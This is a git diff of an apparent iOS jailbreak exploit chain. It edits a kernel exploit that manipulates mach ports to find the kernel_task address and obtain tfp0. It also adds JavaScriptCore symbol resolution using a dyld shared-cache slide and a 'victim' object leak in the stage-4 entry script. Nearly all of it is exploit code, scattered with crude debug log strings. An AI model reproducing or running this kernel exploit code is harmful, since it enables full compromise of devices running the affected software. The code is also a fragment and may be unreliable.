diff options
| -rw-r--r-- | .gitignore | 4 | ||||
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 17 | ||||
| -rw-r--r-- | src/stage4/main.js | 14 |
3 files changed, 32 insertions, 3 deletions
@@ -18,4 +18,6 @@ racoon.conf .vscode
exp_unmin.js
-stage4.js
\ No newline at end of file +stage4.js
+
+.irecovery
\ No newline at end of file diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index aa10126..19d2623 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -289,13 +289,19 @@ function send_ports(target, payload, num, number_port_descs) { function release_port_ptrs(port) { // var req = shit_heap(0x1c + (5 * 0xc) + 0x8); + p0laris_log("fuck"); var req = shit_heap(0x1c + (5 * 0xc) + 0x8); -// p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0")); + p0laris_log("fuck"); + // p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0")); var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); + p0laris_log("fuck"); if (ret != KERN_SUCCESS) { p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret)); + p0laris_log("fuck2"); } + p0laris_log("fuck"); shit_heap_free(req); + p0laris_log("fuck"); } function r3gister(task, init_port_set, real_count, fake_count) { @@ -463,6 +469,9 @@ again: while (true) { sched_yield(); for (var i = 0; i < PORTS_NUM; i++) { // for (var i = 0; i < 8; i++) { + if (i % 4 == 0) { + p0laris_log("release_port_ptrs %d\n", i); + } release_port_ptrs(read_u32(fp + (i << 2))); } @@ -544,7 +553,7 @@ again: while (true) { p0laris_log("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n"); p0laris_log("fuck\n"); call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0); - if (kernel_task_addr === 0xffffffff) { + if (read_u32(kernel_task_addr) === 0xffffffff) { continue again; } p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr)); @@ -552,6 +561,10 @@ again: while (true) { p0laris_log("get lucky\n"); + while (true) { + sleep(3600); + } + return tfp0; } } diff --git a/src/stage4/main.js b/src/stage4/main.js index 53a74ec..af2ed69 100644 --- a/src/stage4/main.js +++ b/src/stage4/main.js @@ -12,6 +12,13 @@ var SOCK_DGRAM = 2; var SOCK_DGRAM = 2; var IPPROTO_UDP = 17; +function prep_shit() { + string_ref = scall("JSStringCreateWithUTF8CString", "victim"); + global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44)); + jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL); + large_buf_ptr = leak_vec(large_buf); +} + function main() { syslog(LOG_SYSLOG, "__p0laris_LOG_START__"); p0laris_log("[*] we out here"); @@ -24,6 +31,13 @@ function main() { printf("test"); + var dyld_shc_slide = get_dyld_shc_slide(); + + sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide; + sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide; + sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide; + prep_shit(); + var tfp0 = get_kernel_task(); syslog(LOG_SYSLOG, "__p0laris_LOG_END__"); |